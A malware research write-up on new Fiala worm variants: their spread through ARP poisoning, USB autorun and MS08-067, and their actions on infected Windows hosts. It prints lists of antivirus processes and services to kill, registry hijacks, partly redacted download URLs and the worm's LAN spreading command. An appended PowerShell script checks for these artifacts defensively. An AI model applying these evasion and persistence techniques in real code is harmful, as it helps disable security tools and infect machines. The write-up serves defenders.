By Tran Minh Quang, Malware Researcher, Bkis
Fiala, originating from China, first appeared in 2008. Over time, Fiala has continuously changed and improved, producing a series of new variants. Fiala has long been able to propagate via USB drives or LANs by using ARP poisoning to insert an Iframe or Script containing dozens of exploit codes for vulnerabilities in different software into HTTP responses. Through this infection method, Fiala can spread quickly within a LAN and sometimes causes system breakdowns.
By overwriting system files such as wuauclt.exe, spoolsv.exe, userinit.exe and linkinfo.dll (depending on the variant), Fiala protects itself well against detection or removal by antivirus software. If the antivirus software deletes the virus without trying to recover the original files, users may then face problems: for example, it becomes impossible to log into the system or use the printer, or Windows cannot be updated.
Recently, Bkis' honeypot has reported that new Fiala variants can spread via the notorious vulnerability MS08-067. Fiala's author might have learned from Conficker. However, unlike Conficker, Fiala makes use of the currently available exploit tool from ph4nt0m.org. This makes the worm even more dangerous.
You can download our free tool BkavHome to remove Fiala here
1. Details about the latest Fiala variants:
Discovered: May 09, 2009
2. Technical Details:
- Creates mutex:
- Deletes the services with the following names:
- avp, RavCCenter, RsScanSrv, RavTask, RsRavMon, ekrn.
- Ends processes:
- 360Safe.exe, 360tray.exe, 360rpt.EXE, Runiep.exe, Rsaupd.exe, RAv.exe, RSTray.exe, CCenter.EXE, RAVMON.EXE, Ravservice.EXE, ScanFrm.exe, rsnetsrv.EXE, RAVTRAY.EXE, RAVMOND.EXE, GuardField.exe, Ravxp.exe, GFUpd.exe, kmailmon.exe, kavstart.exe, KAVPFW.EXE, kwatch.exe, kav32.exe, kissvc.exe, UpdaterUI.exe, rfwsrv.exe, rfwProxy.exe , Rfwstub.exe, RavStub.exe, rfwmain.exe, rfwmain.exe, TBMon.exe, nod32kui.exe, nod32krn.exe, KASARP.exe, FrameworkService.exe, scan32.exe, VPC32.exe, VPTRAY.exe, AntiArp.exe, KRegEx.exe, KvXP.kxp, kvsrvxp.kxp, kvsrvxp.exe, KVWSC.ExE, Iparmor.exe, Avp.EXE, VsTskMgr.exe, EsuSafeguard.ex
- Stops the services:
- McShield, KWhatchsvc, KPfwSvc, Kingsoft Internet Security Common Servi, Symantec AntiVirus, norton AntiVirus server, DefWatch, Symantec AntiVirus Drivers Services, Symantec AntiVirus Definition Watcher, Norton AntiVirus Server, McAfee Framework +
- Writes a Debugger key so that the system runs the virus instead of the following files:
- 360rpt.EXE, 360safe.EXE, 360tray.EXE, 360safebox.EXE, safeboxTray.EXE, AVP.EXE, AVP.COM, AvMonitor.EXE, Ravservice.EXE, RAVTRAY.EXE, CCenter.EXE, IceSword.EXE, Iparmor.EXE, KVMonxp.KXP, KVSrvXP.EXE, KVWSC.EXE, Navapsvc.EXE, Nod32kui.EXE, nod32krn.EXE, KRegEx.EXE, Frameworkservice.EXE, Mmsk.EXE, Ast.EXE, WOPTILITIES.EXE, Regedit.EXE, AutoRunKiller.EXE, VPC32.EXE, VPTRAY.EXE, ANTIARP.EXE, KASARP.EXE, RAV.EXE, kwatch.EXE, kmailmon.EXE, kavstart.EXE, KAVPFW.EXE, Runiep.EXE, GuardField.EXE, GFUpd.EXE, Rfwstub.EXE, rfwmain.EXE, RavStub.EXE, rsnetsvr.EXE, ScanFrm.EXE, RsMain.EXE, Rsaupd.EXE, rfwProxy.EXE, rfwsrv.EXE, SREngLdr.EXE, ArSwp.EXE, RSTray.EXE, QQDoctor.EXE, TrojanDetector.EXE, RSTray.EXE, Trojanwall.EXE, TrojDie.KXP, PFW.EXE, HijackThis.EXE, AutoRun.EXE, KPfwSvc.EXE, kissvc.EXE, kav32.EXE
- Closes windows of which the titles contain:
- NOD32, Process, Mcafee, Firewall, virus, anti, worm, SREng,...
- Backs up the original file "%SysDir%\linkinfo.dll" as "%SysDir%\dllcache\linkinfo.dll"
- Overwrites the original file:
- "%SysDir%\linkinfo.dll", so that the virus is automatically loaded on Windows startup
- Copies itself under the name:
- "GRIL.pif", together with an "autorun.inf" file, onto the disk drives so that the virus runs when users double-click those drives
- Writes key:
- "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\advanced\folder\hidden\showall" to ensure that hidden files cannot be displayed
- Deletes key:
so that the computer cannot start in Safe mode
- Deletes registry keys to prevent the following antivirus programs from starting on Windows startup:
- 360Safetray, 360Safebox, KavStart, vptray, ccApp, RavTray, egui, essact.
- Downloads other malware to the computer:
- http://c.wu[removed]com/dd/33.exe - Module download
- Sets the IE homepage to: http://moneymon[removed]88.com
- Creates popup windows of:
- Downloads file:
- "http://c.wu[removed]com/dd/d.gif" under the name "%WinDir%\Tasks\SA.PIF", a password-protected RAR file
- Creates file:
- %WinDir%\Tasks\explorer.exe - MS08-067 exploit module
- %WinDir%\Fonts\svchost.exe to decompress and run the downloaded file SA.PIF
- "%WinDir%\Tasks\explorer.exe" "<IP in the same range as the infected machine>" "http://c.wu[removed]com/t.css" to spread itself to all computers within the LAN
- Writes key:
- "HKLM\Software\Microsoft\Windows\CurrentVersion\policies\explorer\Run\360safe" to launch itself when Windows starts
- Installs the PushWare malware
- Installs WinPCap
- Creates file:
- "%SysDir%\360box.exe" to "disguise" itself as a gateway
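A defender-side check for the persistence artifacts listed above, written as an added example (it is not Bkis' BkavHome tool or any code from the write-up). It assumes the Debugger values live under the standard Image File Execution Options key and that the SHOWALL key's normal CheckedValue is 1; neither the IFEO location nor the value name is spelled out on the page, and the list of hijacked executables is a subset of the page's list.

```powershell
# Added defender-side check for the Fiala artifacts listed in the write-up.
# Example code, not Bkis' tool; run in an elevated PowerShell on a suspect
# host. Registry paths and file names come from the write-up; the IFEO
# location and the CheckedValue name are assumptions from Windows knowledge.

$findings = @()

# 1. Debugger entries redirecting security tools to the virus. The write-up
#    says a Debugger key is written for each name; IFEO is where that lives.
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$hijacked = '360safe.EXE','360tray.EXE','AVP.EXE','IceSword.EXE','Regedit.EXE',
            'HijackThis.EXE','VPTRAY.EXE','kwatch.EXE','RSTray.EXE'
foreach ($exe in $hijacked) {
    $p = Join-Path $ifeo $exe
    if (Test-Path $p) {
        $dbg = (Get-ItemProperty -Path $p -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { $findings += "IFEO Debugger for $exe -> $dbg" }
    }
}

# 2. SHOWALL tampering so Explorer cannot reveal hidden files
#    (CheckedValue is normally a DWORD of 1; assumption, not from the page).
$showall = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL'
$cv = (Get-ItemProperty -Path $showall -ErrorAction SilentlyContinue).CheckedValue
if ($null -eq $cv -or $cv -ne 1) { $findings += "SHOWALL\CheckedValue is '$cv' (expected 1)" }

# 3. Policies\Explorer\Run value named 360safe used for startup persistence.
$runPol = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
$v = (Get-ItemProperty -Path $runPol -ErrorAction SilentlyContinue).'360safe'
if ($v) { $findings += "Policies\Explorer\Run\360safe -> $v" }

# 4. linkinfo.dll overwritten: compare the live copy with the dllcache backup
#    that the worm itself leaves behind before overwriting.
$live  = Join-Path $env:SystemRoot 'System32\linkinfo.dll'
$cache = Join-Path $env:SystemRoot 'System32\dllcache\linkinfo.dll'
if ((Test-Path $live) -and (Test-Path $cache)) {
    $h1 = (Get-FileHash -Algorithm SHA256 $live).Hash
    $h2 = (Get-FileHash -Algorithm SHA256 $cache).Hash
    if ($h1 -ne $h2) { $findings += "linkinfo.dll differs from dllcache copy ($h1 vs $h2)" }
}

# 5. GRIL.pif dropped on drive roots alongside autorun.inf.
foreach ($d in (Get-PSDrive -PSProvider FileSystem)) {
    $pif = Join-Path $d.Root 'GRIL.pif'
    if (Test-Path $pif) { $findings += "Autorun dropper present: $pif" }
}

if ($findings) { $findings | ForEach-Object { Write-Warning $_ } }
else { Write-Host 'No Fiala artifacts found.' }
```

A differing linkinfo.dll hash is only meaningful if the dllcache copy is itself clean, so verify it against a known-good system file before restoring from it.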